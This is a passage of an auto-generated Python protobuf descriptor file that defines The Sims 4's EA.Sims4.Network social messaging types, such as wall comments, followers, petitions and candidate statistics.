descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.messages',
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='hidden',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.hidden',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.exclude_reported',
index=6,
number=7,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2125,
serialized_end=2342)
_SOCIALPOSTWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialPostWallCommentMessage',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.message',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2345,
serialized_end=2475)
_SOCIALDELETEWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialDeleteWallCommentMessage',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2477,
serialized_end=2562)
_SOCIALREQUESTFEEDWALLMESSAGE = descriptor.Descriptor(name='SocialRequestFeedWallMessage',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='ending_uuid',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.ending_uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.messages',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='unserialized_messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.unserialized_messages',
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_items',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.num_items',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2565,
serialized_end=2778)
_SOCIALREQUESTFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialRequestFollowersMessage',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='playerid',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.playerid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='id',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.id',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prev_last_persona',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.prev_last_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_request',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.num_request',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2780,
serialized_end=2889)
_SOCIALREQUESTIGNORELISTMESSAGE = descriptor.Descriptor(name='SocialRequestIgnoreListMessage',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2891,
serialized_end=2950)
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='origin_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.origin_persona',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='first_party_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.first_party_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3101,
serialized_end=3186)
_SOCIALGETPLAYERINFOLISTMESSAGE = descriptor.Descriptor(name='SocialGetPlayerInfoListMessage',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_info_list',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_info_list',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2953,
serialized_end=3186)
_SOCIALCOMMENTPETITIONMESSAGE = descriptor.Descriptor(name='SocialCommentPetitionMessage',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentid',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentKey',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentKey',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3188,
serialized_end=3276)
_SOCIALBIOPETITIONMESSAGE = descriptor.Descriptor(name='SocialBioPetitionMessage',
full_name='EA.Sims4.Network.SocialBioPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.bio_nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3278,
serialized_end=3346)
_SOCIALFEEDREMOVALMESSAGE = descriptor.Descriptor(name='SocialFeedRemovalMessage',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3348,
serialized_end=3391)
_SOCIALCONTROLMESSAGE = descriptor.Descriptor(name='SocialControlMessage',
full_name='EA.Sims4.Network.SocialControlMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialControlMessage.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=2,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='subop',
full_name='EA.Sims4.Network.SocialControlMessage.subop',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='transactionId',
full_name='EA.Sims4.Network.SocialControlMessage.transactionId',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='result',
full_name='EA.Sims4.Network.SocialControlMessage.result',
index=3,
number=100,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='getwallcommentsmsg',
full_name='EA.Sims4.Network.SocialControlMessage.getwallcommentsmsg',
index=4,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postwallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.postwallcommentmsg',
index=5,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='deletewallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.deletewallcommentmsg',
index=6,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendmsg',
full_name='EA.Sims4.Network.SocialControlMessage.friendmsg',
index=7,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='genericresponse',
full_name='EA.Sims4.Network.SocialControlMessage.genericresponse',
index=8,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='playerinfo',
full_name='EA.Sims4.Network.SocialControlMessage.playerinfo',
index=9,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedsubmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedsubmsg',
index=10,
number=10,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='searchresultmsg',
full_name='EA.Sims4.Network.SocialControlMessage.searchresultmsg',
index=11,
number=11,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviteresponsemsg',
full_name='EA.Sims4.Network.SocialControlMessage.inviteresponsemsg',
index=12,
number=12,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='originerror',
full_name='EA.Sims4.Network.SocialControlMessage.originerror',
index=13,
number=13,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialcassandratest',
full_name='EA.Sims4.Network.SocialControlMessage.socialcassandratest',
index=14,
number=14,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialfriendlistrequestmsg',
full_name='EA.Sims4.Network.SocialControlMessage.socialfriendlistrequestmsg',
index=15,
number=15,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestnucleusidfrompersona',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestnucleusidfrompersona',
index=16,
number=16,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialnucleusidfrompersonaresponse',
full_name='EA.Sims4.Network.SocialControlMessage.socialnucleusidfrompersonaresponse',
index=17,
number=17,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialexchangemessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialexchangemessage',
index=18,
number=18,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestfeedwallmessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestfeedwallmessage',
index=19,
number=19,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='stat_tickers',
full_name='EA.Sims4.Network.SocialControlMessage.stat_tickers',
index=20,
number=21,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='comment_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.comment_petition_msg',
index=21,
number=22,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedremovalmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedremovalmsg',
index=22,
number=23,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.bio_petition_msg',
index=23,
number=24,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='fb_event_msg',
full_name='EA.Sims4.Network.SocialControlMessage.fb_event_msg',
index=24,
number=25,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestfollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestfollowers_msg',
index=25,
number=26,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='responsefollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.responsefollowers_msg',
index=26,
number=27,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestignorelist_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestignorelist_msg',
index=27,
number=28,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='response_player_info_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.response_player_info_list_msg',
index=28,
number=29,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_identification_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.player_identification_list_msg',
index=29,
number=30,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidate_msg',
full_name='EA.Sims4.Network.SocialControlMessage.candidate_msg',
index=30,
number=31,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='evaluation_results_msg',
full_name='EA.Sims4.Network.SocialControlMessage.evaluation_results_msg',
index=31,
number=32,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cg_update_msg',
full_name='EA.Sims4.Network.SocialControlMessage.cg_update_msg',
index=32,
number=33,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3394,
serialized_end=5713)
_SOCIALINVALIDATEMSG = descriptor.Descriptor(name='SocialInvalidateMsg',
full_name='EA.Sims4.Network.SocialInvalidateMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='cache_index',
full_name='EA.Sims4.Network.SocialInvalidateMsg.cache_index',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='key',
full_name='EA.Sims4.Network.SocialInvalidateMsg.key',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5715,
serialized_end=5770)
_SOCIALCONTROLQUEUEBROADCASTMESSAGE = descriptor.Descriptor(name='SocialControlQueueBroadcastMessage',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='control',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.control',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendIds',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.friendIds',
index=1,
number=3,
type=4,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5772,
serialized_end=5888)
_LIFEEVENTMESSAGE = descriptor.Descriptor(name='LifeEventMessage',
full_name='EA.Sims4.Network.LifeEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='type',
full_name='EA.Sims4.Network.LifeEventMessage.type',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='sim_ids',
full_name='EA.Sims4.Network.LifeEventMessage.sim_ids',
index=1,
number=2,
type=6,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5890,
serialized_end=5943)
_SOCIALFACEBOOKEVENTMESSAGE = descriptor.Descriptor(name='SocialFacebookEventMessage',
full_name='EA.Sims4.Network.SocialFacebookEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='objectId',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.objectId',
index=0,
number=1,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accessToken',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.accessToken',
index=1,
number=2,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='guid',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.guid',
index=2,
number=3,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5945,
serialized_end=6026)
_SOCIALCANDIDATESTATISTICSUBMESSAGE = descriptor.Descriptor(name='SocialCandidateStatisticSubmessage',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='remote_id',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.remote_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='views_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.views_count',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='wins_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.wins_count',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.platform',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.category',
index=4,
number=5,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='was_reported',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.was_reported',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x18\x01'))),
descriptor.FieldDescriptor(name='expires_epoch_sec',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.expires_epoch_sec',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6029,
serialized_end=6214)
_SOCIALCANDIDATESMESSAGE = descriptor.Descriptor(name='SocialCandidatesMessage',
full_name='EA.Sims4.Network.SocialCandidatesMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='count',
